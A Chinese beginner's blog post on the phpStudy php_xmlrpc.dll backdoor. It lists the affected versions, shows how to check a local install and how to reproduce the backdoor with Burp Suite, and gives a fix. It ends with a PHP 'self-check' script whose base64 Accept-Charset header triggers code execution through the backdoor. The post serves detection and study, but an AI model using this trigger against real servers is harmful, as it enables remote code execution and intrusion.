小白phpstudy后门检测和复现

一、简介

phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer，一次性安装，无须配置即可使用，是非常方便、好用的PHP调试环境。该程序不仅包括PHP调试环境，还包括了开发工具、开发手册等。

二、漏洞和影响版本

在php的扩展目录下的php_xmlrpc.dll模块中隐藏有后门。

影响的phpstudy版本有：phpStudy20161103版和phpStudy20180211版中的php5.2.17和php5.4.45

三、查看自己下载的phpStudy是否存在后门

找到自己phpStudy的安装目录，下文默认安装在D:\phpStudy中：

切换到目录D:\phpStudy\PHPTutorial\php下，我们可以看到当前的目录结构如下：

分别进去到php5.2.17和php5.4.45目录下的ext目录下，找到php_xmlrpc.dll扩展，并用Notepad++打开，如下：

从上图可知我们当前下载的phpStudy存在后门。

四、漏洞的利用

如下图切换phpStudy到指定版本：

1、打开浏览器输入服务器IP地址，我当前的IP是172.16.18.18

2、打开我们的抓包神器Burp Suite

3、开启浏览器代理

4、漏洞复现

Burp Suite已捕获当前流量：

将当前访问通过Burp Suite重放数据包：

切换菜单栏到Repeater下，可以看到当前访问的请求头信息：

修改请求头信息：

成功处罚后门。

五、漏洞修复

从PHP官网下载对应的原始php_xmlrpc.dll文件进行替换。

快门

六、自检脚本

header("Content-type:text/html;Charset=utf8");
$url = 'http://172.16.18.18:82/l.php';
$header = array();
$header[] = "Accept-Encoding: gzip,deflate";
$header[] = "Accept-Charset: cGhwaW5mbygpOw==";
$ch =curl_init();
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch,CURLOPT_HEADER,false);
curl_setopt($ch,CURLOPT_HTTPHEADER,$header);
curl_setopt($ch, CURLINFO_HEADER_OUT, TRUE);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$content = curl_exec($ch);
​
curl_close($ch);
echo  $content;